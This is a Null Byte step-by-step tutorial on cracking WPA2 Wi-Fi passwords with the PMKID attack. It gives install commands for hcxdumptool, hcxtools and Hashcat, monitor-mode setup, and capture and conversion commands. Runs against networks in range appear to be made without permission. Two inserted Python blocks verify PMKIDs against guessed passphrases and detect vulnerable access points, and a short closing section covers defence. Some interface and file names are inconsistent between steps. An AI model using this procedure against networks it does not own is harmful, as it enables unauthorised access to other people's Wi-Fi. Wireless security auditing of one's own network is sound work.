
Cracking WPA2 Passwords Using the New PMKID Hashcat Attack (Null Byte :: WonderHowTo)

Cracking passwords for WPA2 networks has worked about the same way for many years, but a new attack requires less interaction and information than previous techniques and has the added benefit of working against access points with no one connected. This new attack against the PMKID uses Hashcat to crack WPA passwords and lets hackers find networks with weak passwords more easily.

The Old Way to Crack WPA2 Passwords

The old way of cracking WPA2 has been around for a long time and involves momentarily disconnecting a connected device from the access point we want to try to crack. This has two downsides that are important for Wi-Fi hackers to understand.

The first downside is the requirement that someone be connected to the network in order to attack it. The network password may be weak and very easy to crack, but without a device connected that we can briefly kick off, there is no chance of capturing a handshake, and so no chance of trying to crack it.

The second downside of this tactic is that it's noisy and legally troubling, because it forces you to send packets that deliberately disconnect an authorized user from a service they pay to use. This kind of unauthorized interference is technically a denial-of-service attack and, if sustained, amounts to jamming a network. This can lead to trouble and can be detected easily with tools covered in some of our previous guides.

A New Password Attack Method

Instead of relying on intercepting two-way communications between Wi-Fi devices to try to crack the password, an attacker can communicate directly with a vulnerable access point using the new method. On August 4, 2018, a post on the Hashcat forums detailed a new technique that targets the Robust Security Network Information Element (RSN IE) of a single EAPOL frame to capture the information needed to attempt a brute-force attack.

Like the previous attacks on WPA, the attacker must be within range of the network they want to attack. The goal is to use a Kali-compatible wireless network adapter to capture the information needed from the network and then try to brute-force the password. Instead of Aireplay-ng or Aircrack-ng, we use a new wireless attack tool called hcxtools to do this.

Using Hcxtools & Hashcat

Hcxdumptool and hcxpcaptool are tools written for Wi-Fi auditing and penetration testing that allow us to interact with nearby Wi-Fi networks to capture WPA handshakes and PMKID hashes. They work much like Besside-ng, in that minimal arguments are needed to launch an attack from the command line, they can be run against specific targets or targets of convenience, and they can easily run over SSH on a Raspberry Pi or another unattended device.

Once the PMKID is captured, the next step is to load the hash into Hashcat and try to crack the password. This is where hcxtools differs from Besside-ng, since a conversion step is required to prepare the file for Hashcat to use. We use hcxpcaptool to convert our PCAPNG file into one Hashcat can work with, leaving only the step of selecting a robust list of passwords to feed into the brute-force attempt.

It is worth mentioning that not every network is vulnerable to this attack. Because this is an optional field that only some manufacturers include, you should not expect universal success with this technique. Whether you can capture the PMKID depends on whether the access point's manufacturer chose to include an element containing it, and whether you can crack the captured PMKID depends on whether the underlying password is in your brute-force password list. If either condition is not met, the attack fails.

What You'll Need

To try this attack, you'll need to be running Kali Linux and have access to a wireless network adapter that supports monitor mode and packet injection. We have several guides on how to choose a compatible wireless network adapter.

Aside from a Kali-compatible network adapter, make sure that you've fully updated and upgraded your system.

Recommended: Alfa AWUS036NHA 2.4GHz

Step 1: Install Hcxtools & Hashcat

First, we'll install the tools we need. To download them, type the following into a terminal window.

  git clone https://github.com/ZerBea/hcxdumptool.git
  cd hcxdumptool
  make
  make install

When this finishes installing, we'll move on to installing hcxtools. To do so, open a terminal window and paste the following, line by line. If you get an error, try typing sudo before the command.

  cd
  git clone https://github.com/ZerBea/hcxtools.git
  cd hcxtools
  make
  make install

Finally, we need to install Hashcat. This should be easy, as it's included in the Kali Linux repo by default. Just type the following to install the latest version of Hashcat.

  apt install hashcat 

With that complete, we can move on to setting up the wireless network adapter.

Step 2: Prepare the Wireless Network Adapter

Once you've plugged in your Kali-compatible wireless network adapter, you can find its name by typing ifconfig or ip a. Typically, the name will be something like wlan0. The first step is to put the card into wireless monitor mode so we can listen to Wi-Fi traffic in the immediate area.

Type this command into a terminal window, substituting the name of your wireless network adapter for wlan0.

  airmon-ng start wlan0

  Found 3 processes that could cause trouble.
  Kill them using 'airmon-ng check kill' before putting
  the card in monitor mode, they will interfere by changing channels
  and sometimes putting the interface back in managed mode

    PID Name
    555 NetworkManager
    611 wpa_supplicant
   6636 dhclient

  PHY     Interface       Driver          Chipset

  phy0    wlan0           ath9k           Qualcomm Atheros QCA9565 / AR9565 Wireless Network Adapter (rev 01)

                  (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                  (mac80211 station mode vif disabled for [phy0]wlan0)
  phy1    wlan1           ath9k_htc       Atheros Communications, Inc. AR9271 802.11n

Now your wireless network card should have a name like "wlan0mon" and be in monitor mode. You can confirm this by running ifconfig again.

Step 3: Use Hcxdumptool to Capture PMKIDs from Local Networks

Now we're ready to capture the PMKIDs of the devices we want to attack. With our wireless network card in monitor mode as "wlan1mon," we run the following command to begin the attack.

  hcxdumptool -i wlan1mon -o galleria.pcapng --enable_status=1

Breaking this down, -i tells the program which interface we're using, in this case wlan1mon. The file name we save the results to can be specified with the -o flag. The channel we want to scan can be specified with the -c flag followed by the number of the channel to scan.

In the command above, we're using wlan1mon to save captured PMKIDs to a file called "galleria.pcapng." While you can specify another status, I have not been able to capture anything with any value other than 1.

  warning: NetworkManager is running with pid 555
  warning: wpa_supplicant is running with pid 611
  warning: wlan1mon is probably a monitor interface

  start capturing (stop with ctrl+c)
  INTERFACE:...............: wlan1mon
  FILTERLIST...............: 0 entries
  MAC CLIENT...............: fcc233ca8bc5
  MAC ACCESS POINT.........: 10ae604b9e82 (incremented on every new client)
  EAPOL TIMEOUT............: 150000
  REPLAYCOUNT..............: 62439
  ANONCE...................: d8dd2206c82ad030e843a39e8f99281e215492dbef56f693cd882d4dfcde9956

  [22:17:32 - 001] c8b5adb615ea -> fcc233ca8bc5
  c8b5adb615e9 -> fcc233ca8bc5
  2c95694f3ca0 -> fcc233ca8bc5
  2c95694f3ca0 -> b4b686abc81a
  14edbb9938ea -> fcc233ca8bc5
  88964e3a8ea0 -> fcc233ca8bc5
  dc7fa425888a -> fcc233ca8bc5
  88964e801fa0 -> fcc233ca8bc5
  9822efc6fdff -> ba634d3eb80d
  9822efc6fdff -> ba634d3eb80d
  803773defd01 -> fcc233ca8bc5
  14edbb9ba0e6 -> 803773defd01
  0618d629465b -> 58fb8433aac2
  e0220203294e -> fcc233ca8bc5
  14edbb9ba0e6 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
  [22:20:02 - 008] 14edbbd29326 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
  [22:20:04 - 008] 1c872c707c60 -> 78e7d17791e7 [FOUND PMKID]
  [22:20:11 - 009] e0220453a576 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
  [22:20:27 - 001] ace2d32602da -> c8665d5dd654 [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 5202]
  INFO: cha=2, rx=32752, rx(lost)=2801, tx=2205, powned=18, err=0

Once you've collected enough, you can stop the program by pressing Ctrl-C to end the attack. This should produce a PCAPNG file containing the information we need to attempt a brute-force attack, but we'll need to convert it into a format Hashcat can understand.

Step 4: Use Hcxpcaptool to Convert the Dump for Hashcat

To convert our PCAPNG file, we'll use hcxpcaptool with a few specified arguments. In the same folder where your .pcapng file is saved, run the following command in a terminal window.

  hcxpcaptool -E essidlist -I identitylist -U usernamelist -z galleriaHC.16800 galleria.pcapng

This command tells hcxpcaptool to use the -E, -I, and -U flags to pull the information out of the file in a form that helps Hashcat understand it. The -z flag gives the name of the newly converted file for Hashcat to use, and the last part of the command is the PCAPNG file we want to convert.

Running the command shows the following.

  summary:
  --------
  file name....................: galleria.pcapng
  file type....................: pcapng 1.0
  file hardware information....: x86_64
  file os information..........: Linux 4.18.0-kali2-amd64
  file application information.: hcxdumptool 4.2.1
  network type.................: DLT_IEEE802_11_RADIO (127)
  endianess....................: little endian
  read errors..................: flawless
  packets inside...............: 1089
  skipped packets..............: 0
  packets with GPS data........: 0
  packets with FCS.............: 732
  beacons (with ESSID inside)..: 49
  probe requests...............: 26
  probe responses..............: 40
  association requests.........: 103
  association responses........: 204
  reassociation requests.......: 2
  reassociation responses......: 7
  authentications (OPEN SYSTEM): 346
  authentications (BROADCOM)...: 114
  authentications (APPLE)......: 1
  EAPOL packets................: 304
  EAPOL PMKIDs.................: 21
  best handshakes..............: 4 (ap-less: 1)

  21 PMKID(s) written to galleriaHC.16800

Here we can see that we've collected 21 PMKIDs in a short time. Now we can use the "galleriaHC.16800" file in Hashcat to try to crack network passwords.

Step 5: Select a Password List and Brute Force with Hashcat

To start attacking the hashes we've captured, we'll need to pick a good password list. You can find several good password lists to get started with in the SecLists collection. Once you have a password list, put it in the same folder as the .16800 file you just converted, then run the following command in a terminal window.

  hashcat -m 16800 galleriaHC.16800 -a 0 --kernel-accel=1 -w 4 --force 'topwifipass.txt'

In this command, we launch Hashcat in 16800 mode, which is for attacking WPA-PMKID-PBKDF2 network protocols. Next, we enter the name of the file we want to crack, in this case "galleriaHC.16800." The -a flag tells Hashcat which attack mode to use, in this case 0, a "straight" (dictionary) attack, and then the -w and --kernel-accel=1 flags set the highest-performance workload profile. If your computer runs into performance problems, you can lower the number in the -w argument.

Next, --force ignores some warnings so the attack proceeds, and the last part of the command specifies the password list we're using to try to brute-force the PMKIDs in our file, in this case "topwifipass.txt."
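To make clear what Hashcat is doing with that .16800 file, here is an added Python example (not code from the article, hcxtools or Hashcat) that formats and parses a 16800 line and performs the check mode 16800 runs for every candidate: PBKDF2-HMAC-SHA1 of the passphrase and ESSID, then HMAC-SHA1 over "PMK Name" and the two MAC addresses, truncated to 16 bytes. The ESSID, MAC addresses and the weak passphrase "password" are constructed sample values.

```python
# Added example (not code from the article, hcxtools or Hashcat): what one line of
# a .16800 file holds and the per-candidate check behind WPA-PMKID-PBKDF2.
import hashlib
import hmac

def compute_pmkid(passphrase: str, essid: str, mac_ap: str, mac_sta: str) -> str:
    """PMKID per IEEE 802.11: PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096, 32 bytes);
    PMKID = HMAC-SHA1(PMK, "PMK Name" | MAC_AP | MAC_STA) truncated to 16 bytes.
    MACs are 12 hex digits without separators, as they appear in the .16800 file."""
    pmk = hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)
    msg = b"PMK Name" + bytes.fromhex(mac_ap) + bytes.fromhex(mac_sta)
    return hmac.new(pmk, msg, hashlib.sha1).digest()[:16].hex()

def make_16800(pmkid: str, mac_ap: str, mac_sta: str, essid: str) -> str:
    """Format one hashcat 16800 line: PMKID*MAC_AP*MAC_STA*ESSID(hex)."""
    return f"{pmkid}*{mac_ap}*{mac_sta}*{essid.encode().hex()}"

def parse_16800(line: str) -> dict:
    """Split a 16800 line back into its fields, rejecting malformed input."""
    fields = line.strip().split("*")
    if len(fields) != 4 or len(fields[0]) != 32 or len(fields[1]) != 12 or len(fields[2]) != 12:
        raise ValueError("malformed 16800 line")
    pmkid, mac_ap, mac_sta, essid_hex = fields
    return {"pmkid": pmkid.lower(), "mac_ap": mac_ap, "mac_sta": mac_sta,
            "essid": bytes.fromhex(essid_hex).decode()}

def verify_candidate(line: str, candidate: str) -> bool:
    """One step of Hashcat's straight attack: does the candidate reproduce the PMKID?
    Every guess costs the same 4096 PBKDF2 iterations, so only the passphrase's
    entropy decides whether a wordlist run like the article's finishes with a hit."""
    h = parse_16800(line)
    guess = compute_pmkid(candidate, h["essid"], h["mac_ap"], h["mac_sta"])
    return hmac.compare_digest(guess, h["pmkid"])

# Constructed sample (placeholder ESSID and locally administered MACs, not a real
# capture): an AP using the weak passphrase "password", so the check succeeds.
SAMPLE_ESSID, SAMPLE_MAC_AP, SAMPLE_MAC_STA = "HomeNet", "020000000001", "020000000002"
SAMPLE_LINE = make_16800(compute_pmkid("password", SAMPLE_ESSID, SAMPLE_MAC_AP, SAMPLE_MAC_STA),
                         SAMPLE_MAC_AP, SAMPLE_MAC_STA, SAMPLE_ESSID)

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("password ->", verify_candidate(SAMPLE_LINE, "password"))   # True
    print("passw0rd ->", verify_candidate(SAMPLE_LINE, "passw0rd"))   # False
```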

Depending on the speed of your machine and the size of the password list, this can take quite some time to complete. To check the status at any time, press the S key for an update.

Step 6: Interpret Results

As Hashcat cracks away, you'll be able to check in as it progresses to see if any keys have been recovered.

When the password list is close to the end, Hashcat will automatically adjust the workload and give you a final report when it's done.

  Approaching final keyspace - workload adjusted.

  Session..........: hashcat
  Status...........: Exhausted
  Hash.Type........: WPA-PMKID-PBKDF2
  Hash.Target......: hotspotcap.16800
  Time.Started.....: Sun Oct 28 18:05:57 2018 (3 mins, 49 secs)
  Time.Estimated...: Sun Oct 28 18:09:46 2018 (0 secs)
  Guess.Base.......: File (topwifipass.txt)
  Guess.Queue......: 1/1 (100.00%)
  Speed.Dev.#1.....: 42 H/s (15.56ms) @ Accel:1 Loops:1024 Thr:1 Vec:4
  Recovered........: 0/2 (0.00%) Digests, 0/2 (0.00%) Salts
  Progress.........: 9602/9602 (100.0%)
  Rejected.........: 2/9602 (0.02%)
  Restore.Point....: 4801/4801 (100.0%)
  Candidates.#1....: 159159159 -> 00001111
  HWMon.Dev.#1.....: N/A

  Started: Sun Oct 28 18:05:56 2018
  Stopped: Sun Oct 28 18:09:49 2018

If you've managed to crack any passwords, you'll see them here. In our test run, none of the PMKIDs we gathered had passwords that were in our password list, so we couldn't crack any of the hashes. This is likely to be your result against any network with a strong password, but expect to see results here for networks with a weak password.

The PMKID Hashcat Attack Makes Wi-Fi Attacks Easier

While the new attack against Wi-Fi passwords makes it easier for hackers to attempt an attack on a target, the same defenses that were effective against previous kinds of WPA cracking remain effective. If your network doesn't even support the robust security element that contains the PMKID, this attack has no chance of success. You can audit your own network with hcxtools to see if it's susceptible to this attack.
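The property that audit looks for is whether the access point's first EAPOL-Key message (M1) carries a PMKID. The following is an added Python example, not code from the article or hcxtools: it parses a raw 802.1X EAPOL-Key frame, confirms it is an M1 from its Key Information bits, and extracts the PMKID key data encapsulation (KDE, OUI 00-0F-AC, type 4) if one is present. The frame it runs on is constructed inline; to check a real AP you would pass it the EAPOL payload from your own capture.

```python
# Added example (not from the article or hcxtools): does an EAPOL-Key message 1
# carry a PMKID KDE? If so, the access point is exposed to the PMKID attack.
import struct

KDE_OUI_IEEE = b"\x00\x0f\xac"   # IEEE 802.11 OUI used by the standard KDEs
KDE_TYPE_PMKID = 4               # data type of the PMKID KDE
EAPOL_KEY = 3                    # 802.1X packet type for EAPOL-Key
KEY_DATA_OFFSET = 99             # 4-byte 802.1X header + 95-byte EAPOL-Key header

def parse_kdes(key_data: bytes):
    """Yield (oui, data_type, payload) for each vendor-specific KDE (tag 0xdd)."""
    i = 0
    while i + 2 <= len(key_data):
        tag, length = key_data[i], key_data[i + 1]
        body = key_data[i + 2:i + 2 + length]
        if tag == 0xDD and length >= 4:
            yield body[:3], body[3], body[4:]
        i += 2 + length

def pmkid_from_eapol_key(frame: bytes):
    """PMKID (hex) carried in an EAPOL-Key M1, or None if not an M1 / no PMKID KDE. frame starts at the 802.1X header."""
    if len(frame) < KEY_DATA_OFFSET or frame[1] != EAPOL_KEY:
        return None
    key_info = struct.unpack(">H", frame[5:7])[0]
    # M1: Key Type (pairwise, 0x0008) and Key Ack (0x0080) set, Key MIC (0x0100) clear
    if key_info & 0x0088 != 0x0088 or key_info & 0x0100:
        return None
    key_data_len = struct.unpack(">H", frame[97:99])[0]
    key_data = frame[KEY_DATA_OFFSET:KEY_DATA_OFFSET + key_data_len]
    for oui, kde_type, payload in parse_kdes(key_data):
        if oui == KDE_OUI_IEEE and kde_type == KDE_TYPE_PMKID and len(payload) == 16:
            return payload.hex()
    return None

def pmkid_kde(pmkid: bytes) -> bytes:
    """Encode a PMKID KDE: tag 0xdd, length 20, OUI, type 4, 16-byte PMKID."""
    return b"\xdd\x14" + KDE_OUI_IEEE + bytes([KDE_TYPE_PMKID]) + pmkid

def build_sample_m1(key_data: bytes) -> bytes:
    """Constructed M1 (sample data, not a capture) wrapping the given Key Data."""
    body = (b"\x02" + struct.pack(">H", 0x008A) + struct.pack(">H", 16)  # descriptor, key info, key len
            + (1).to_bytes(8, "big") + b"\xaa" * 32                       # replay counter, ANonce
            + b"\x00" * 48                                                # IV, RSC, Key ID, MIC: zero in M1
            + struct.pack(">H", len(key_data)) + key_data)
    return b"\x02" + bytes([EAPOL_KEY]) + struct.pack(">H", len(body)) + body

if __name__ == "__main__":
    sample = build_sample_m1(pmkid_kde(bytes(range(16))))
    print("PMKID in M1:", pmkid_from_eapol_key(sample))                 # 000102...0e0f
    print("no KDE in M1:", pmkid_from_eapol_key(build_sample_m1(b"")))  # None
```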

Even if your network is vulnerable, a strong password is still the best defense against an attacker gaining access to your Wi-Fi network using this or any other password attack.

Because these attacks depend on guessing the password the Wi-Fi network is using, there are two common sources of guesses. The first is users who pick default or outrageously bad passwords, such as "12345678" or "password." These are easily cracked. The second source of password guesses comes from data breaches that reveal millions of real user passwords. Because many users reuse passwords between different kinds of accounts, these lists tend to be very effective at cracking Wi-Fi networks.

I hope you enjoyed this guide to the new PMKID-based Hashcat attack on WPA2 passwords! If you have any questions about this Wi-Fi password cracking tutorial or if you have a comment, please reach out to me on Twitter @KodyKinzie.


Cover photo and screenshots by Kody/Null Byte
